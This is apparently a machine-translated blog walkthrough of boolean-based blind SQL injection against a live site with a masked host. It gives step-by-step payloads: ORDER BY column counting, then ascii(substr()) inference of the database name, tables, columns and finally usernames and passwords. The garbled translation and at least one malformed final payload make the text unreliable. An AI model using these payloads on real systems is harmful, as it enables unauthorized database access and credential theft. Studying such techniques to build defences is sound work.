On the principle of blind Note
Before the United States to find a site with an injection was found to be blind, simply talk about the principle of the blinds.
step
1.xxx.com/index.php?ID=79 single quotes this position error, and directly give an error message:
know that his watch is catalog, and is a single quote closed.
SQL: SELECT *FROM catalog WHERE ID = '79''
2. attempt to close, input '- + After the page to return to normal.
3. Start guess field.
Entry
ID=79' order by 5--+
Textbook error returned.
No error message is the fifth field.
Unknown column '5' in 'order clause'
Continue to try to enter
ID=79' order by 4--+
Return to normal, indicating that there are currently four fields in Table
4. view return information
input:
ID=79' select 1,2,3,4 --+
Tried many times will not display any information, so try blinds.
Here, his name has been out of the table, but I chose to look at the other table. So, to start from scratch.
Input:
ID=79' and length(database())>10 --+
View his database name is greater than 10, an error is returned
when to continue, test, return to normal more than 9
to continue to identify
input:
ID=79' and length(database())=10 --+
Finalize his database names are 10 characters
5. began to speculate that the database name
first guess that the first letters
opened ascii table
database name should be from a to z
type:
ID=79' and ascii(substr(database(),1,1))>122 --+
If the first letter of the database ascii code greater than 122, an error is returned
optional, it is determined whether or not more than 50, returns true. Continue
is greater than 75, return true
115 final measured first letter database ascii code values return to normal.
115 corresponds to s. Therefore, the first letter database is s.
Tested in the same manner as the second character ascii code 101, the code corresponding to ascii characters as e.
6. In the above method the final measure database called sedimental
next burst table
and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0--+
The payload for me this chicken dish is not good intuitive understanding, we look to a local mysql environment.
Input:
select table_name from information_schema.tables where table_schema=database()
It is displayed directly in the current database table name.
After entering the payload display, return multiple rows
then use the limit parameter
limit0,1 -> the first line of data
limit1,2 -> the second line of data
so that a table row.
Input:
and ascii(substr((select table_name from information_schema.tables where table _schema=database() limit 0,1),1,1))>0 --+
Interpretation: whether to return a list of the first letter ascii code is greater than 0
and so, come to the first table, the second table.
7. burst fields
and ascii(substr((select column_name from information_schema.columns where table_name=‘xxxx’ limit 0,1),1,1))>0
8. explosive content
and ascii(substr((select username,password from xxxx limit 0,1),1,1))>0
Similar principles above.
End.
Finally Austria, there is a problem I hope big brother said.
